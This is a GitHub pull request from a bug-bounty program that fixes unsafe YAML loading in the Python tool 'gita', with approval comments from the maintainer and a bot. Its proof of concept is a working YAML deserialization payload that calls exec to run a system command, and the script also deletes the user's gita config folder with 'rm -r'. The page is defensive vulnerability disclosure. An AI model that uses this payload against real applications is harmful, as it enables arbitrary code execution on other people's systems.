Skip to content
This repository has been archived by the owner on Dec 19, 2023. It is now read-only.

Arbitary Code Execution Fixed #1

Merged
merged 2 commits into from
Jan 30, 2021
Merged

Arbitary Code Execution Fixed #1

merged 2 commits into from
Jan 30, 2021

Conversation

Anon-Artist
Copy link

@Anon-Artist Anon-Artist commented Jan 30, 2021
edited
Loading

📊 Metadata *

gita helps to Manage multiple git repos with sanity.

Bounty URL: https://www.huntr.dev/bounties/1-pip-gita

⚙️ Description *

Vulnerable to YAML deserialization attack caused by unsafe loading.

💻 Technical Description *

Fixed by avoiding unsafe loader.

🐛 Proof of Concept (PoC) *

Create the following PoC file:
exploit.py

# exploit.py
import os
os.sysem('pip3 install gita')
from gita.utils import get_cmds_from_files
payload = """cmd: !!python/object/new:type
  args: ["z", !!python/tuple [], {"extend": !!python/name:exec }]
  listitems: "__import__('os').system('calc.exe')"
"""
os.system("cd ~/.config")
os.system('rm -r gita')
os.system("mkdir gita")
os.chdir("gita")
open('cmds.yml','w+').write(payload)
get_cmds_from_files()
print("calc has been poped -> Arbitrary Code Execution")

Execute the commands in another terminal:

python exploit.py

xcalc will pop up.

🔥 Proof of Fix (PoF) *

After fix it will not popup a calc.

👍 User Acceptance Testing (UAT)

After fix functionality is unaffected.

🔗 Relates to...

https://www.huntr.dev/bounties/1-pip-gita

huntr-helper pushed a commit to 418sec/huntr that referenced this pull request Jan 30, 2021
Added fix submission to FixSubmissionCount for 418sec/gita#1
b4f7ac6
@huntr-helper
Copy link
Member

👋 Hello, @nosarthur - @Anon-Artist has opened a PR to us with a fix for a potential vulnerability in your repository. To view the vulnerability, please refer to the bounty URL in the first comment, above.

Ultimately, you get to decide if the fix is 👍 or 👎. If you are happy with the fix, please write a new comment (@huntr-helper - LGTM) and we will open a PR to your repository with the fix. All remaining PRs for this vulnerability will be automatically closed.

If you have any questions or need support, come and join us on our community Discord!

@nosarthur & @Anon-Artist - thank you for your efforts in securing the world’s open source code! 🎉

@nosarthur
Copy link

lgtm, thanks for bringing it up! please go ahead with the PR

@Anon-Artist
Copy link
Author

Thanks @nosarthur can you please type like this
@huntr-helper - LGTM as comment because huntr bot need to detect this

@nosarthur
Copy link

@huntr-helper - LGTM

@huntr-helper huntr-helper merged commit 331c0bf into 418sec:master Jan 30, 2021
@JamieSlome
Copy link

@Anon-Artist - it looks like this didn't fire off as the bounty URL was invalid at point of LGTM.

Have added some background logic to validate this for next time, cheers! 🍰

@418sec 418sec deleted a comment from huntr-helper Jan 31, 2021
@huntr-helper huntr-helper mentioned this pull request Jan 31, 2021
Merged
@JamieSlome
Copy link

@nosarthur - the PR has been opened upstream!

Thanks! 🍰

Sign up for free to subscribe to this conversation on GitHub. Already have an account? Sign in.
Reviewers
No reviews
Assignees
No one assigned
Labels
None yet
Projects
None yet
Milestone
No milestone
Development

Successfully merging this pull request may close these issues.
4 participants
@Anon-Artist @huntr-helper @nosarthur @JamieSlome